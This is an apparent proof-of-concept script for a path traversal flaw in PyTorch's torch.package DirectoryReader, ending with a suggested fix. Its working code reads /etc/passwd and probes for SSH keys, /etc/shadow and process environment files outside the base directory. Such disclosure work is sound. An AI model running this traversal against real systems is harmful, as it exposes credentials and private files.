# Source: poc-pytorch-dirreader / poc_dirreader_traversal.py
# (uploaded by 0xiviel using huggingface_hub, commit b9770f5, verified)
#!/usr/bin/env python3
"""
PoC: Path Traversal in DirectoryReader — Arbitrary File Read
Vulnerability: torch.package._directory_reader.DirectoryReader constructs file
paths by joining its base directory with unsanitized user/package-supplied
names. get_record() and get_storage_from_record() build the path with an
f-string, and has_record() uses os.path.join(); none of them validate the
result:
    def get_record(self, name):
        filename = f"{self.directory}/{name}"  # NO PATH VALIDATION
        with open(filename, "rb") as f:
            return f.read()
Path traversal via "../" sequences therefore reads arbitrary files from the
filesystem.
DirectoryReader is used by PackageImporter when loading unzipped torch.package
directories. A malicious package with crafted record names can read any file
accessible to the process (e.g., /etc/passwd, SSH keys, environment files).
Root cause: torch/package/_directory_reader.py:36, 41, 47
Tested: PyTorch 2.10.0+cpu on Python 3.13.11
"""
import os
import sys
import tempfile
import torch
from torch.package._directory_reader import DirectoryReader
def demonstrate_direct_traversal():
    """Demonstrate path traversal via DirectoryReader.get_record().

    A DirectoryReader is rooted at a fresh temporary directory and asked for a
    record whose name climbs out of that directory to /etc/passwd.

    Returns:
        True if the file outside the base directory was read, False otherwise.
    """
    print()
    print("=" * 70)
    print(" Part 1: Direct Path Traversal via get_record()")
    print("=" * 70)
    print()
    target = "/etc/passwd"
    # TemporaryDirectory deletes the base directory on exit; mkdtemp() left
    # one behind on every run.
    with tempfile.TemporaryDirectory(prefix="pkg_") as tmpdir:
        reader = DirectoryReader(tmpdir)
        print(f" DirectoryReader base: {tmpdir}")
        print()
        # One "../" per component of the *physical* base path reaches the
        # filesystem root. A fixed "../../../../" falls short when the temp dir
        # is nested deeper (e.g. macOS /var/folders/.../T/), and realpath()
        # matters because the kernel resolves ".." through symlinked parents.
        base = os.path.realpath(tmpdir)
        traversal_path = "../" * base.count(os.sep) + target.lstrip("/")
        resolved = os.path.normpath(os.path.join(base, traversal_path))
        print(f" get_record('{traversal_path}')")
        print(f" Resolves to: {resolved}")
        print()
        try:
            data = reader.get_record(traversal_path)
        except FileNotFoundError:
            print(" [-] File not found (expected on some systems)")
            return False
        except Exception as e:  # report any other failure instead of aborting the PoC
            print(f" [-] Error: {type(e).__name__}: {e}")
            return False
    content = data.decode("utf-8", errors="replace")
    lines = content.strip().split("\n")
    print(f" [+] SUCCESS — Read {len(data)} bytes from {target}")
    print(f" [+] Lines: {len(lines)}")
    print()
    # Show first few lines as proof
    print(" Contents (first 5 lines):")
    for line in lines[:5]:
        print(f" {line}")
    print()
    return True
def demonstrate_has_record_traversal():
    """Demonstrate path traversal via has_record() for filesystem probing.

    has_record() only reports whether a path is an existing regular file, so
    this probes for file existence outside the base directory without
    reading any contents.

    Returns:
        True if at least one probed file outside the base directory exists.
    """
    print()
    print("=" * 70)
    print(" Part 2: Filesystem Probing via has_record()")
    print("=" * 70)
    print()
    # (absolute target, description); the traversal name for each target is
    # derived from the base directory's depth below.
    targets = [
        ("/etc/passwd", "System users"),
        ("/etc/shadow", "Password hashes (needs root)"),
        ("/etc/hostname", "Hostname"),
        ("/root/.ssh/id_rsa", "Root SSH key"),
        ("/root/.bashrc", "Root bashrc"),
        ("/proc/self/environ", "Process environment"),
    ]
    found_count = 0
    # TemporaryDirectory deletes the base directory on exit (mkdtemp leaked it).
    with tempfile.TemporaryDirectory(prefix="pkg_") as tmpdir:
        reader = DirectoryReader(tmpdir)
        print(f" DirectoryReader base: {tmpdir}")
        print()
        # One "../" per component of the physical base path reaches the root,
        # however deeply the temp dir is nested (a fixed depth of 4 may not).
        up_to_root = "../" * os.path.realpath(tmpdir).count(os.sep)
        print(" Probing for sensitive files via has_record():")
        print()
        for target, desc in targets:
            path = up_to_root + target.lstrip("/")
            exists = reader.has_record(path)
            status = "EXISTS" if exists else "not found"
            if exists:
                found_count += 1
            print(f" has_record('{path}'): {status} ({desc})")
    print()
    print(f" [+] Found {found_count} files via path traversal probing")
    return found_count > 0
def demonstrate_storage_traversal():
    """Demonstrate path traversal via get_storage_from_record().

    Reads /etc/hostname, located outside the reader's base directory, as a
    uint8 storage.

    Returns:
        True if the file was read through the storage API, False otherwise.
    """
    print()
    print("=" * 70)
    print(" Part 3: File Read via get_storage_from_record()")
    print("=" * 70)
    print()
    target = "/etc/hostname"
    # TemporaryDirectory deletes the base directory on exit (mkdtemp leaked it).
    with tempfile.TemporaryDirectory(prefix="pkg_") as tmpdir:
        reader = DirectoryReader(tmpdir)
        print(f" DirectoryReader base: {tmpdir}")
        print()
        # One "../" per component of the physical base path reaches the root,
        # however deeply the temp dir is nested (a fixed depth of 4 may not).
        base = os.path.realpath(tmpdir)
        traversal_path = "../" * base.count(os.sep) + target.lstrip("/")
        resolved = os.path.normpath(os.path.join(base, traversal_path))
        print(f" get_storage_from_record('{traversal_path}', ...)")
        print(f" Resolves to: {resolved}")
        print()
        try:
            # UntypedStorage.from_file(shared=False) requires the file to hold
            # at least numel * itemsize bytes, so a fixed 256 fails on short
            # files such as /etc/hostname. Request exactly the file's size.
            numel = os.path.getsize(resolved)
            # Read as uint8 storage (1 byte per element).
            result = reader.get_storage_from_record(traversal_path, numel, torch.uint8)
            data = bytes(result.storage().tolist())
        except FileNotFoundError:
            print(" [-] File not found")
            return False
        except Exception as e:  # report any other failure instead of aborting the PoC
            print(f" [-] Error: {type(e).__name__}: {e}")
            return False
    content = data.rstrip(b"\x00").decode("utf-8", errors="replace").strip()
    print(f" [+] SUCCESS — Read {len(data)} bytes via storage API")
    print(f" [+] Content: {content}")
    print()
    return True
def demonstrate_package_importer_scenario():
    """Show realistic attack: malicious unzipped package reads /etc/passwd.

    Lays out a minimal unzipped torch.package directory (only
    ``.data/extern_modules``). It then reads a file outside that directory
    through a DirectoryReader rooted at it.

    NOTE(review): PackageImporter itself is not invoked here; the printed
    attack steps 2-4 are described, not exercised by this function.

    Returns:
        True if /etc/passwd was read through the reader, False otherwise.
    """
    print()
    print("=" * 70)
    print(" Part 4: Realistic Attack — Malicious Unzipped Package")
    print("=" * 70)
    print()
    target = "/etc/passwd"
    # TemporaryDirectory removes the fake package afterwards (mkdtemp leaked it).
    with tempfile.TemporaryDirectory(prefix="malicious_pkg_") as tmpdir:
        data_dir = os.path.join(tmpdir, ".data")
        os.makedirs(data_dir, exist_ok=True)
        # extern_modules file (required by PackageImporter)
        with open(os.path.join(data_dir, "extern_modules"), "w", encoding="utf-8") as f:
            f.write("")
        print(f" Created fake unzipped package: {tmpdir}")
        print()
        print(" Attack scenario:")
        print(" 1. Attacker creates a malicious unzipped torch.package directory")
        print(" 2. Package pickle references records with ../ traversal paths")
        print(" 3. Victim loads package with PackageImporter(directory)")
        print(" 4. PackageImporter creates DirectoryReader(directory)")
        print(" 5. DirectoryReader.get_record() reads files outside the package")
        print()
        # Module-level DirectoryReader is used; the former local re-import was redundant.
        reader = DirectoryReader(tmpdir)
        # One "../" per component of the physical base path reaches the root,
        # however deeply the temp dir is nested (a fixed depth of 4 may not).
        traversal_path = "../" * os.path.realpath(tmpdir).count(os.sep) + target.lstrip("/")
        try:
            data = reader.get_record(traversal_path)
        except Exception as e:  # same error report format as the other parts
            print(f" [-] Error: {type(e).__name__}: {e}")
            return False
    lines = data.decode("utf-8", errors="replace").strip().split("\n")
    print(f" [+] DirectoryReader read /etc/passwd: {len(lines)} lines")
    return True
def demonstrate_vulnerability_pattern():
    """Print the vulnerable DirectoryReader methods and a suggested fix.

    The excerpts are printed with real indentation, so the suggested
    ``_safe_path`` helper is valid Python that can be copied verbatim.
    """
    print()
    print("=" * 70)
    print(" Part 5: Vulnerability Details")
    print("=" * 70)
    print()
    print(" All three methods are vulnerable (_directory_reader.py:35-48):")
    print()
    print("    def get_record(self, name):  # line 35")
    print('        filename = f"{self.directory}/{name}"  # NO VALIDATION')
    print('        with open(filename, "rb") as f:')
    print("            return f.read()")
    print()
    print("    def get_storage_from_record(self, name, numel, dtype):  # line 40")
    print('        filename = f"{self.directory}/{name}"  # NO VALIDATION')
    print("        ...")
    print("        return _HasStorage(storage.from_file(filename=filename, ...))")
    print()
    print("    def has_record(self, path):  # line 46")
    print("        full_path = os.path.join(self.directory, path)  # NO VALIDATION")
    print("        return os.path.isfile(full_path)")
    print()
    print(" FIX: Validate that the resolved path stays within self.directory:")
    print(" ─────────────────────────────────────────────────────────")
    # commonpath() is used instead of startswith(base + os.sep): when base is
    # the filesystem root, base + os.sep == "//" and every name is rejected.
    # realpath() also neutralises absolute names, which os.path.join() would
    # otherwise let replace the base entirely.
    print("    def _safe_path(self, name):")
    print("        base = os.path.realpath(self.directory)")
    print("        full = os.path.realpath(os.path.join(base, name))")
    print("        if os.path.commonpath([base, full]) != base:")
    print("            raise ValueError(f'Path traversal: {name}')")
    print("        return full")
    print()
def main():
    """Run every demonstration in order and print a summary of what succeeded."""
    print()
    print(" PoC: DirectoryReader Path Traversal → Arbitrary File Read")
    print(f" PyTorch {torch.__version__}, Python {sys.version.split()[0]}")
    print()
    # Part 1: Direct traversal
    read_ok = demonstrate_direct_traversal()
    # Part 2: Filesystem probing
    probe_ok = demonstrate_has_record_traversal()
    # Part 3: Storage read
    storage_ok = demonstrate_storage_traversal()
    # Part 4: Realistic scenario
    scenario_ok = demonstrate_package_importer_scenario()
    # Part 5: Vulnerability details
    demonstrate_vulnerability_pattern()
    # Summary
    print("=" * 70)
    print(" RESULTS:")
    if read_ok:
        print(" [+] get_record(): Read /etc/passwd via path traversal")
    if probe_ok:
        print(" [+] has_record(): Probed filesystem for sensitive files")
    if storage_ok:
        print(" [+] get_storage_from_record(): Read file via storage API")
    if scenario_ok:
        print(" [+] Realistic scenario: Malicious package reads /etc/passwd")
    # Make an all-negative run explicit instead of an empty results list.
    if not any((read_ok, probe_ok, storage_ok, scenario_ok)):
        print(" [-] No traversal could be demonstrated on this system")
    print(" [+] Root cause: no path validation in DirectoryReader methods")
    print(" [+] Fix: validate resolved path stays within base directory")
    print("=" * 70)
if __name__ == "__main__":
    # Run the demonstrations only when executed as a script, never on import.
    main()